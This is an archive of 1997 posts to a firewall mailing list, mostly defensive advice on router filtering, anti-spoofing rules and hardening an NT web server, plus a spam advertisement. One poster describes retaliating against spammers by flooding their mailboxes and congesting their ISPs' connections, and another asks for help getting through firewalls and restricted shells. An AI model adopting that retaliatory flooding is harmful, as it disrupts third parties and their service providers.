accounting software and the laser printer. CheckRite 2000 provides the software to allow printing of laser checks from a PC or Mainframe computer without having to buy MS-ACCESS, dBase or other software. Each laser check is numbered when the printing occurs and is easily audited with your accounting program. Features of the CheckRite 2000 * Password security * Scanned signatures and logos are printed as part of the check * Account Screen maintains company and bank detail * Print blank checks and check books * Issue checks on demand for numerous companies and accounts * Import Text/ASCII data into CheckRite 2000 database * Historical log of checks printed with all details stored * Print checks on Laser Bond check paper or standard laser paper Printerm offers full support services to get your laser check printing operational ** MICR toner and HP LaserJet MICR printing Kits are also available from Printerm. For further information please contact: Charles Katz:Printerm Datascribe,Inc.| printerm@softcell.net 300 Pearl St., suite 200 | voice:716-842-3099 Buffalo,NY 14202 | Fax: 716-842-6049 WEB Site: http://bisinc.com/printerm/ Download a Free Demo now!!!!! From firewalls-owner Wed Jan 8 19:15:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA12143 for firewalls-outgoing; Wed, 8 Jan 1997 19:04:02 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA12125 for ; Wed, 8 Jan 1997 19:03:33 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0viAle-0004FTC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 04:02:58 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 9 Jan 97 04:02 MET Received: by lina id m0viAf1-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 03:56:07 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: internal filtering router - filter config? To: uscny8hb@ibmmail.com Date: Thu, 9 Jan 1997 03:56:06 +0100 (MET) Cc: Firewalls@GreatCircle.COM In-Reply-To: <32D3A3BF.5D36@dreamscape.com> from "Steven E. Matkoski" at Jan 8, 97 08:40:15 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > Thanks, I also read that you could block source-routed packets there, > also. You should block them on the external router to protect your DMZ from spoofing attacks. Usually an external (in front of DMZ/firewall) and an internal (after DMZ/firewall) filtering router will do the following (apart from routing of course :) external: spoof protection DMZ protection internal spoof protection internal net protection snoop protection from DMZ/firewall with: spoof protection is block all packets with source address from inside on external interface block all packets with source address not from inside on internal interface block all reserved/not-routed networks block all unusual packages like broadcast and multicast and source routed block all oversized packages or broken packages DMZ protection is allow only connections to sudden ports of the DMZ/firewall hosts internal net protection is allow only connections to sudden/no ports of internal hosts optionally allow all outgoing connections snoop protection dont let any internal->internal packets reach the DMZ/firewall his are the general usage for those routers. Of course you can add additional task or leave some out, depending on your local security policy. > If I am using a cisco router, how does on go about this? or can I get a > location for documentation. www.cisco.com and the CD which is deliveerd with your cisco router. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Wed Jan 8 23:43:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA26270 for firewalls-outgoing; Wed, 8 Jan 1997 23:15:48 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24956 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:48 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06301 for ; Tue, 7 Jan 1997 12:28:18 -0800 (PST) From: uskanbye@ibmmail.com Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23214; Tue, 7 Jan 1997 21:29:03 +0100 X-Mailer: XFMail 1.0 [p0] on Linux Received: from relay3.UU.NET by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA32132; Mon, 6 Jan 1997 08:33:09 +0100 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxhe04920; Mon, 6 Jan 1997 02:30:36 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST) X-Uidl: 852547705.003 Message-Id: Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST Date: Tue, 31 Dec 1996 16:00:41 EST X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't agree with premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical). ----------------WWW.INK.ORG\PUBLIC\KDHE------------------- --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- ----------Mills Bldg Suite 501 Topeka, KS 66612----------- ---------Phone (913) 296-5643 FAX (913) 296-8943---------- *** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 *** Date: Tue, 31 Dec 1996 11:41:27 -0800 From: Mark Johnson To: Dale Drew CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked Dale Drew wrote: > > I don't see how CDROM provides significant advantages on a WEB server > "graffiti" attack. > > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT (or the user that owns > the http process), and the system has some form of (or access to) > writable media available. > > The attacker just repoints the httpd root tree to the writable media (eg; > "/tmp") and away from the CDROM. > > http://www.security.mci.net > =============================================================== > Dale Drew MCI Telecommunications > Sr. Manager internetMCI Security > Engineering > Voice: 703/715-7058 Internet: ddrew@mci.net > Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335 > > At 11:57 PM 12/30/96 -0500, Michael Idengren wrote: > >I don't know about the rest of you but I agree with the idea of putting a > >webserver on a CD-ROM. I think the government can afford to write a new > >CD every time they need to update someone's email address anyways :) > > > >Mike Idengren | MEISTER > >---------------------------------+---------------------------------- > >Center for Information Technology| Alachua Free-Net IRC Administrator > >Stetson University | WorldWide Free-Net IRC Network Coordinator > > > > > > > > > > I have not set one up yet(Planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm of deny my thoughts? Mark -- Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us ---- End of mail text Additional SMTP headers from original mail item follow: Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-9604 17-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbas in.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PS T) Message-ID: <32C96C67.7D78@hercules.reno.nv.us> X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 References: <3.0.32.19961231124626.007717e4@166.45.1.38> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 8 23:44:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24931 for firewalls-outgoing; Wed, 8 Jan 1997 22:54:09 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24838 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:23 -0800 (PST) Received: from id.co.zw (a3-jhb-65.dial-up.net [196.26.216.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA24866 for ; Tue, 7 Jan 1997 08:18:08 -0800 (PST) Received: from miller.id.co.zw ([196.33.153.100]) by id.co.zw (8.6.11/8.6.9) with ESMTP id SAA13975 for ; Tue, 7 Jan 1997 18:15:08 +0200 Message-Id: <199701071615.SAA13975@id.co.zw> From: "Sean Miller" To: Subject: Help in any of the folowing if at all possible Date: Tue, 7 Jan 1997 16:05:01 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need some help in getting through firewalls (and if anyone can on getting through shells with restriced acces or access denied) Please help. Mark From firewalls-owner Wed Jan 8 23:48:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24886 for firewalls-outgoing; Wed, 8 Jan 1997 22:53:49 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24827 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:13 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19840 for ; Tue, 7 Jan 1997 06:43:41 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.DC2C2E40@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:41:49 -0800 Message-ID: From: Darren Cromer To: "'Ricardo Alvarado'" , "'firewalls@GreatCircle.COM'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 06:41:49 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why ICMP? Im curious what inherent risk that would present. I too am setting up a screening firewall, but I want to allow pings to traverse the external router. (any advice on how to filter all ICMP except pings?) >---------- >From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx] >Sent: Friday, January 03, 1997 10:20 AM >To: firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? > >>What type of things would you filter on the internal router? or even >>the external router? I am going to be installing a firewall real soon >>and would really appreciate any help. >> >>-steve. >>matkoski@dreamscape.com > >In your external router you'd block any ICMP traffic going back and >forth, as well as any packets bearing one of your internal IP addresses, >as a source address, especially if these are going INTO your protected >network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill >any ports that your users will not be using, andl leave just mail, web, >ftp, etc. > >ricardo >ralvarado@avantel.com.mx > > From firewalls-owner Wed Jan 8 23:59:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24983 for firewalls-outgoing; Wed, 8 Jan 1997 22:55:10 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24964 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:56 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA08128 for ; Tue, 7 Jan 1997 13:07:50 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id NAA18072; Tue, 7 Jan 1997 13:06:34 -0800 Received: from cidexchange.infosel.com.mx(148.246.8.22) by mycroft via smap (V1.3mjr) id sma018063; Tue Jan 7 13:05:44 1997 Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id <01BBFCAB.9DC681A0@cidexchange.infosel.com.mx>; Tue, 7 Jan 1997 15:01:09 -0600 Message-ID: From: =?iso-8859-1?Q?Jaime_Alberto_Botello_Cant=FA?= To: "'firewalls@GreatCircle.COM'" Cc: "'matkoski@dreamscape.com'" , "'Ricardo Alvarado'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 15:01:03 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve, Is very important to block any TCP traffic that come with the established flag off. This is very important for example if you have intranets to protect, in this case for example, you want to allow internal users to access web servers outside, but you don=B4t want = outside users access your intranet web, ftp, etc. Doing this you have to take some ftp things to consider, you may need to use FTP passive connections for your internal users access ftp servers outside. Look, if you want more information you may get Building Internet Firewalls (O'Reilly & Associates) at www.greatcircle.com. Hope this help. Jaime A Botello C Departamento de Redes y Telecomunicaciones Informaci=F3n Selectiva S.A. de C.V. Calzada San Pedro #507 Colonia Fuentes del Valle, C.P. 66220 Tel: (528) 318-8943 Fax: (528) 318-8981 email: jbotello@infosel.com.mx > > >-----Original Message----- >From: Ricardo Alvarado [SMTP:ralvarado@avantel.com.mx] >Sent: Viernes 3 de Enero de 1997 9:21 AM >To: firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? > >>What type of things would you filter on the internal router? or even >>the external router? I am going to be installing a firewall real soon >>and would really appreciate any help. >> >>-steve. >>matkoski@dreamscape.com > >In your external router you'd block any ICMP traffic going back and >forth, as well as any packets bearing one of your internal IP >addresses, >as a source address, especially if these are going INTO your protected >network. Also, kill telnets, fingers, snmp and snmp trap. Actually, >kill >any ports that your users will not be using, andl leave just mail, web, >ftp, etc. > >ricardo >ralvarado@avantel.com.mx > From firewalls-owner Thu Jan 9 02:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA07782 for firewalls-outgoing; Thu, 9 Jan 1997 01:57:53 -0800 (PST) Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA07773 for ; Thu, 9 Jan 1997 01:57:41 -0800 (PST) Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) id AA03652; Thu, 9 Jan 97 11:03:03 +0100 Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) id KAA11431; Thu, 9 Jan 1997 10:53:28 +0100 Date: Thu, 9 Jan 1997 10:53:28 +0100 From: peter.maersk-moller@jrc.it (Peter Maersk-Moller) Message-Id: <199701090953.KAA11431@ceo0912.jrc.it> To: firewalls@GreatCircle.COM Subject: Re: CheckRite Laser Checks! Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: ywYJvmMVYLzlS7KBP1+GRQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi firewall list subscribers. This is not firewall related but it is firewall mailing list related. There are probably a lot of people getting tired over these commercial offers mailed to you through mailing lists. Instead of trying to stop them how about allow them, but advertise that the price for using them for distributing commercial offers is something like $100.000 or what ever will be too expensive. If a company then uses others mailing list for commercial distribution they have to pay for the service, however you will probably need a court decision that allow you to charge a fee for companies using others mailing list. Does anybody know how the legal aspect of this is ? I mean, there are a lot of services I will have to pay for if I use them. Is it legal for a company to use a service setup by me without paying for it ? How do we create the legal grounds for charging companies that uses other peoples mailing lists for commercial junkmail distribution ? I used to trace down the sender of junkmail and filled their mailbox and congested their Internet connection or their ISP Internet connection. After that I usually used to find the bosses of the responsible for sending junkmail to explain how much dammage their employees have brought to their companies, but it seems there are to many incompetent loonies in the world. Regards Peter Maersk-Moller (Speaking for myself and nobody else) From firewalls-owner Thu Jan 9 05:44:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA13574 for firewalls-outgoing; Thu, 9 Jan 1997 05:37:44 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA13567 for ; Thu, 9 Jan 1997 05:37:29 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFE3A.C164AF20@ram-exch-ns1.ramstein>; Thu, 9 Jan 1997 14:38:18 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: TCP WRAPPERS FOR DEC ALPHA RUNNING NT 4.0??? Date: Thu, 9 Jan 1997 14:38:16 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Thanks to everyone who responded to my last question. I got a lot of >people who suggested using TCP Wrappers to add another layer of >security. I did a lot of research (CERT etc), but only found TCP >Wrappers for UNIX machines. Does anyone know where I can find a TCP >Wrapper for a DEC Alpha (64 or 32 bit) running Windows NT 4.0? Thanks >for you help. > >Albert E. Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 > From firewalls-owner Thu Jan 9 06:29:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15381 for firewalls-outgoing; Thu, 9 Jan 1997 06:25:50 -0800 (PST) Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15374 for ; Thu, 9 Jan 1997 06:25:39 -0800 (PST) Received: from martel.demon.co.uk ([158.152.221.102]) by relay-10.mail.demon.net id aa1017462; 9 Jan 97 14:02 GMT Message-ID: Date: Thu, 9 Jan 1997 10:24:42 +0000 To: firewalls@greatcircle.com From: Ian Gresley-Jones Subject: Re: packet filtering on PPP interfaces In-Reply-To: <9701062217.AA04330@omsk.quadrix.com> MIME-Version: 1.0 X-Mailer: Turnpike Version 3.00 <5FNnYA8I4VwTBaSmGLF2KtVCy5> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9701062217.AA04330@omsk.quadrix.com>, BVE writes > >I figured that someone would've answered this one by now, but I haven't seen a >message on the list.... > > Is anyone aware of ppp implementation that include packet filtering? Or of > (nit-based?) packet filtering implementations that could be applied to a > ppp interface under Solaris 1 (Solaris 1.2 to be exact)? > >I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box >from the Internet. It was a while ago, so I don't remember all the details, >but it provided what (at the time) seemed like a fairly good set of features, >for that type of software. It was pretty simple to configure.... > >I don't know if it's good enough for your needs, but it's a place to start.... > I'd definitely recommend looking at Morningstar - you can get various docs from the Web/ftp site (either www.morningstar.com or the site referred to from there because the company was bought out late last year I believe). The filtering facilties are good and they've implemented many other options like CHAP authentication etc. Costs about USD750 IIRC. You can get a one month free trial. Go for it! Regards Ian #include I have no association with Morningstar or the current vendor of this product. ******************************************************************** * Ian Gresley-Jones ZZR600 * * ******************************************************************** From firewalls-owner Thu Jan 9 06:46:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15576 for firewalls-outgoing; Thu, 9 Jan 1997 06:30:27 -0800 (PST) Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15569 for ; Thu, 9 Jan 1997 06:30:08 -0800 (PST) Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA22045; Thu, 9 Jan 1997 08:22:20 -0600 Message-Id: <32D4FF1B.6956@exphub.pmh.org> Date: Thu, 09 Jan 1997 08:22:19 -0600 From: "Cary Conover(IS) 13897" Organization: Parkland Memorial Hospital X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2) Mime-Version: 1.0 To: Chris Pugrud Cc: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Pugrud wrote: > > This really as not as bad of a situation as it seems. Here are a few > pointers to vastly increasing the security of the system. This is not > the be all or end all of security. I am sure that there are more steps > that you can take to increase your security even more. Buyer Beware. > Your mileage may vary... > > Apply sp2 for Windows NT 4.0 > SP2 fixes several bugs in the OS and IIS > http://www.microsoft.com/ntserversupport/Default-SL.HTM > > The machine really should be used only for serving web pages. If you > can dedicate a singular machine, even a 486, to just tossing HTTP then > you can greatly increase the security. > Under Control Panel > Services, Only the following MUST be running for > a web server: > EventLog > FTP Publishing Service (optional) > Plug and Play (NT 4.0) > Workstation > World Wide Web Publishing Service > Only these services should be set "Automatic". All other services > should be set "manual." Be careful, your mileage may vary... > > Use IIS security > IIS has some built in allow/deny filtering based on IP address > Internet Service Manager > WWW Service Properties > Advanced TAB > > CGI/BIN is BAD (by default) > Remove scripts and the HTML Administrator if installed > Internet Service Manager > Directories > Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all > others, especially any that you can not identify. > While you are there make sure to go to "logging" and set up logs > Also go c:\InetPub and set security > NT Explorer > C:\InetPub > right click > properties > security > > permissions > Replace Permissions on Subdirectories > Replace Permissions on Existing Files > Make Everyone Read (RX)(RX) > Make Administrator Full Control (All)(All) > Remove all others > This sets things up so that only the administrator can make changes > and they must be made from the machine. > > Use the OS security > NT 4.0 has basic packet filtering built in > Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > > Advanced > Enable Security > Configure > Permit Only (TCP Ports) > Add > 80 (http) > Permit Only (UDP Ports) > (leave blank) > Permit Only (IP Protocols) > Add > 6 (TCP) > This really cuts down what the machine can do. If you need to surf > from the machine you may need to add 53 to UDP Ports. > While you in the control panel, also check your bindings: > Control Panel > Network > Bindings > Show Bindings for "all > protocols." > Make sure that "TCP/IP" is Enabled > Disable all others > Show bindings for "all adapters" > Expand the adapter (click the plus box) > Expand WINS Client > You may need to Enable Workstation If the networking will not start on > reboot > If you do, make sure to disable server and NetBIOS Interface > Restart your computer > > Good day and Good luck > > Chris > > >-----Original Message----- > >From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil] > >Sent: Wednesday, January 08, 1997 3:52 AM > >To: Firewalls Mailing list > >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > > > >I am responsible for securing (as well as I can) a DEC Alpha running > >Windows NT 4.0 and Internet Information Server as our WWW Server. It is > >sitting as a node on our LAN and everyone in the world can access it. I > >want a program that I can run on it that will allow/disallow blocks of > >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but > >not as necessary) it to keep detailed logs. I have heard of O'Reiley's > >WebSite, but I don't know if this will do. I do not have funding for an > >expensive firewall machine, and it is impracticle to add routers into > >our LAN. Please help if you have any suggestions. Thanks. > > > >albert.franke@ramstein.af.mil > >Albert E. Franke, 2Lt, USAF > >OIC, USAFE Web Tech Support 480-7905 I don't know if you folks caught this or not. He is on a LAN on a fairly large Air Force Base in Germany. This means not only is his Website open to attack so are many of the bases computer systems. It appears that there are larger issues here than meet the eye. His Security Squadron should be involved as well as the Communications Squadron that is stationed on the base. With the military it takes a long while to get anything done unless you do it yourself on a shoe string. The money comes from above once a year in a budget process that is antiquated and very slow to adjust to change. This is one area that changes on as frequent as an hour to hour basis. There are initiatives going out from the Pentagon to do things about this and the President himself has even put out the word to Secure the Military Systems. However the priority in the field is not on Securing the Sites. It is on keeping the job they presently have. They are in the one mistake and your out of the game military. I wish Albert luck. Hopefully he can get the Base Commanders Attention so that the Comm Squadron will put in a Firewall at the access point to the internet on the base. Otherwise the whole base's security on their network is suspect. On the other hand there could be security in place and he just is not aware that it is there. Chances are the previous is the case. -- Cary From firewalls-owner Thu Jan 9 07:48:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17990 for firewalls-outgoing; Thu, 9 Jan 1997 07:31:18 -0800 (PST) Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17952 for ; Thu, 9 Jan 1997 07:31:01 -0800 (PST) Received: from creator.gu.kiev.ua (root@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id RAA58560 for ; Thu, 9 Jan 1997 17:30:36 +0200 Received: (from stesin@localhost) by creator.gu.kiev.ua id RAA02686 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:26:47 +0200 From: Andrew Stesin Message-Id: <199701091526.RAA02686@creator.gu.kiev.ua> Subject: Re: which mta 4 dmz To: firewalls@greatcircle.com Date: Thu, 9 Jan 1997 17:26:47 +0200 (EET) Reply-To: stesin@gu.kiev.ua In-Reply-To: <199701050519.AAA15351@exon.massart.mass.edu> from "Paonia Ezrine" at Jan 5, 97 00:19:56 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | I am tring to deside which mta do use on the external mail machine. I am | thinking about these | 1. sendmail 8.8.4 | 2. zmailer 2.9.44.1 | 3. qmail 0.95 | 4. exim 5. SVR4.2 mail system (comes i.e. with SCO UnixWare 2.1.x) | what are people using. What would you sugject pros/conns? As for me, I know sendmail well, so I use it; but 5) seems to be an interesting alternative, too. | thanks | paonia -- Best, Andrew Stesin nic-hdl: ST73-RIPE From firewalls-owner Thu Jan 9 08:03:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA18928 for firewalls-outgoing; Thu, 9 Jan 1997 07:51:22 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net (smtp-gw01.ny.us.ibm.net [165.87.194.252]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA18909 for ; Thu, 9 Jan 1997 07:51:07 -0800 (PST) Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id PAA21226 for ; Thu, 9 Jan 1997 15:50:42 GMT Received: from slip139-92-81-170.ma.es.ibm.net(139.92.81.170) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smap6sDmb; Thu Jan 9 15:47:16 1997 Message-ID: <32D5122A.5290@ibm.net> Date: Thu, 09 Jan 1997 16:43:38 +0100 From: Juan José Vázquez Rubio X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: cancel Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please cancel... jjvaz@ibm.net Thanks From firewalls-owner Thu Jan 9 08:31:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20329 for firewalls-outgoing; Thu, 9 Jan 1997 08:17:52 -0800 (PST) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20313 for ; Thu, 9 Jan 1997 08:17:34 -0800 (PST) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id IAA19057 for ; Thu, 9 Jan 1997 08:19:38 -0800 (PST) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA21039; Thu, 9 Jan 97 08:16:50 PST Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id IAA23062 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 9 Jan 1997 08:16:30 -0800 (PST) Message-Id: <199701091616.IAA23062@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id F947F90BA7A2D1A28825641A005993D1; Thu, 9 Jan 97 08:16:22 EDT To: "Sean Miller" Cc: firewalls From: Ryan Russell/SYBASE Date: 9 Jan 97 8:18:44 EDT Subject: Re: Help in any of the folowing if at all possible X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hmm... getting in or out? :) Ryan ---------- Previous Message ---------- To: firewalls cc: From: miller @ id.co.zw 